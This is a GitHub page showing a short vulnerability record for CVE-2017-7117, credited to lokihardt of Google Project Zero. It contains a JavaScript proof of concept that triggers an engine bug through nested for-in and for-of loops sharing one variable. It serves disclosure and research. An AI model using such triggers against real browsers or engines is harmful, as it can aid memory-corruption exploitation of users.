Skip to content

Latest commit

 

History

History
27 lines (19 loc) · 407 Bytes

CVE-2017-7117.md

File metadata and controls

27 lines (19 loc) · 407 Bytes

CVE-2017-7117

  • Report: Jul 2017
  • Fix: Sep 2017
  • Credit: lokihardt, Google Project Zero

PoC

function f() {
    let o = {};
    for (let i in {xx: 0}) {
        for (i of [0]) {

        }

        print(o[i]);
    }
}

f();

Reference